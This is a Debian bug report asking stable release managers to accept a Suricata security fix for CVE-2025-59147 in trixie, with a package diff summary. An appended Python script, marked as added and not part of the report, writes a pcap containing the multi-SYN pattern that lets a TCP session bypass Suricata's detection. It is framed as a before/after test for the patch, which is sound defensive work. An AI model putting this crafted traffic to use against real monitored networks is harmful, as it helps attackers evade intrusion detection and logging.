Package: release.debian.org
Severity: normal
Tags: trixie
X-Debbugs-Cc: suricata@packages.debian.org, satta@debian.org, dev@andreas-dolp.de
Control: affects -1 + src:suricata
User: release.debian.org@packages.debian.org
Usertags: pu

Dear stable release managers,

I'd like to hand in another security patch for suricata 7.0.10 in Debian trixie. In accordance with the security team, the CVE will not warrant a DSA and should be included in the next point release. We'd like to release this patch together with #1116945 as suricata 1:7.0.10-1+deb13u1 for suite 'trixie' in 13.2.

[ Reason ]
Security fix for CVE-2025-59147 [1]
Upstream ticket: [2]

[ Impact ]
Crafted traffic sending multiple SYN packets with different sequence numbers within the same flow tuple can cause Suricata to not pick up the TCP session. In IDS mode this can lead to a detection and logging bypass. In IPS mode this will lead to the flow getting blocked. [4]

[ Tests ]
In the original upstream ticket [3] there are pcaps and rules attached. Testing against the vulnerable and the fixed version shows the vulnerability is fixed as expected. Unit tests in autopkgtest run successfully for the patched version.

[ Risks ]
Program crashes if the fix contained errors, but not patching the vulnerability can lead to bypassing detection, which would miss the point of an IDS/IPS.

[ Checklist ]
[x] *all* changes are documented in the d/changelog
[x] I reviewed all changes and I approve them
[x] attach debdiff against the package in (old)stable
[x] the issue is verified as fixed in unstable

[ Changes ]
Applied patch containing upstream commit e91b03c9, but slightly modified to fit Suricata 7.0.10. [5]

[ Other info ]
[1] https://security-tracker.debian.org/tracker/CVE-2025-59147
[2] https://redmine.openinfosecfoundation.org/issues/7852
[3] https://redmine.openinfosecfoundation.org/issues/7657
[4] https://github.com/OISF/suricata/security/advisories/GHSA-v8hv-6v7x-4c2r
[5] https://github.com/OISF/suricata/commit/e91b03c9.patch
Attachment:
0001-Fix-CVE-2025-59147-in-7.0.10-for-trixie.patch
Description: application/mbox
File lists identical (after any substitutions)
Control files: lines which differ (wdiff format)
------------------------------------------------
Installed-Size: [-8989-] {+8925+}
Version: [-1:7.0.10-1-] {+1:7.0.10-1+deb13u1+}
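The Impact section describes the trigger only in words: several SYNs with different sequence numbers on one flow tuple, after which the session may not be picked up. As an added example (not part of this bug report, the debdiff, or Suricata's own code or test suite), the standard-library Python script below writes a pcap carrying exactly that pattern, so a reader can replay it with `suricata -r multi_syn.pcap` against the 1:7.0.10-1 and 1:7.0.10-1+deb13u1 builds and compare which one logs the flow and any stream-dependent alerts. The endpoint addresses and MACs, the two ISNs, the HTTP request payload, and the choice that the server completes the handshake against the last SYN are all assumptions of this example; the pcaps attached to upstream ticket [3] remain the authoritative reproducer.

```python
"""Write a pcap reproducing the traffic shape in the CVE-2025-59147 impact
description: multiple client SYNs with different ISNs on the same 4-tuple,
then a completed handshake and one data segment. Standard library only."""
import struct

SYN, ACK, PSH = 0x02, 0x10, 0x08

# Constructed endpoints (assumed for this example, not from the report):
# (MAC, IPv4 address, TCP port)
CLIENT = (bytes.fromhex("020000000001"), "10.0.0.1", 40000)
SERVER = (bytes.fromhex("020000000002"), "10.0.0.2", 80)


def _csum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def _ip(addr: str) -> bytes:
    return bytes(int(o) for o in addr.split("."))


def frame(src, dst, seq, ack, flags, payload=b"") -> bytes:
    """Ethernet/IPv4/TCP frame with correct IP and TCP checksums."""
    smac, sip, sport = src
    dmac, dip, dport = dst
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags,
                      65535, 0, 0) + payload
    pseudo = _ip(sip) + _ip(dip) + struct.pack("!BBH", 0, 6, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", _csum(pseudo + tcp)) + tcp[18:]
    iph = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6,
                      0, _ip(sip), _ip(dip))
    iph = iph[:10] + struct.pack("!H", _csum(iph)) + iph[12:]
    return dmac + smac + b"\x08\x00" + iph + tcp


def checksums_ok(f: bytes) -> bool:
    """Re-sum a frame's IP header and TCP segment; both must fold to zero."""
    ihl = (f[14] & 0x0F) * 4
    iph, tcp = f[14:14 + ihl], f[14 + ihl:]
    pseudo = iph[12:16] + iph[16:20] + struct.pack("!BBH", 0, 6, len(tcp))
    return _csum(iph) == 0 and _csum(pseudo + tcp) == 0


def multi_syn_session(isns=(1000, 5000), server_isn=777, answered=-1,
                      payload=b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"):
    """One client SYN per ISN on the same 4-tuple (the pattern from the
    advisory), then the server answers the SYN chosen by `answered` (default:
    the last one; which SYN a real peer answers is an assumption here), the
    client ACKs and sends one data segment."""
    pkts = [frame(CLIENT, SERVER, isn, 0, SYN) for isn in isns]
    cseq = isns[answered] + 1
    pkts.append(frame(SERVER, CLIENT, server_isn, cseq, SYN | ACK))
    pkts.append(frame(CLIENT, SERVER, cseq, server_isn + 1, ACK))
    pkts.append(frame(CLIENT, SERVER, cseq, server_isn + 1, PSH | ACK, payload))
    return pkts


def to_pcap(frames, start_ts=1700000000) -> bytes:
    """libpcap container, link type 1 (Ethernet), 1 ms between packets."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", start_ts, i * 1000, len(f), len(f)) + f
    return out


def summarize(pcap: bytes):
    """Parse the pcap back into (src_ip, sport, dst_ip, dport, flags, seq)."""
    rows, off = [], 24
    while off < len(pcap):
        _, _, incl, _ = struct.unpack_from("<IIII", pcap, off)
        off += 16
        f = pcap[off:off + incl]
        off += incl
        ihl = (f[14] & 0x0F) * 4
        sip = ".".join(map(str, f[26:30]))
        dip = ".".join(map(str, f[30:34]))
        sport, dport, seq, _, _, flags = struct.unpack_from("!HHIIBB", f[14 + ihl:])
        rows.append((sip, sport, dip, dport, flags, seq))
    return rows


if __name__ == "__main__":
    data = to_pcap(multi_syn_session())
    with open("multi_syn.pcap", "wb") as fh:
        fh.write(data)
    for row in summarize(data):
        print(row)
```

Replaying the resulting file against both builds with the same rule set (for instance the rules attached to ticket [3]) gives a direct before/after comparison of whether the session, and anything that depends on it being tracked, shows up in the eve/fast logs. The `answered` parameter lets you also generate the variant where the server picks the first ISN instead of the last, which is worth checking because the advisory does not say which SYN the peer must answer for the mis-tracking to occur.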